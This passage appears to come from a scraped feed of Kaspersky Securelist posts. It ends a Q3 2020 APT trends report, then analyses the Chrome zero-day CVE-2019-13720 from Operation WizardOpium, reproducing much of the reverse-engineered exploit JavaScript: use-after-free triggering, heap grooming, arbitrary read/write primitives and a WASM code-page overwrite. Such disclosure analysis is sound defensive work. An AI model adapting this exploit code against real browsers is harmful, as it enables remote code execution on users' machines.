elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. 
(aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. 
In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. 
A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. 
We believe that the same organization was probably also the target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. 
Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. 
While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. 
We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such as COVID-19 to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT 
campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. 
The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. 
A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function 
getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. 
It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n 
\t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. 
If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. 
This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n 
\n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. 
The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet 
freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. 
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. 
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. 
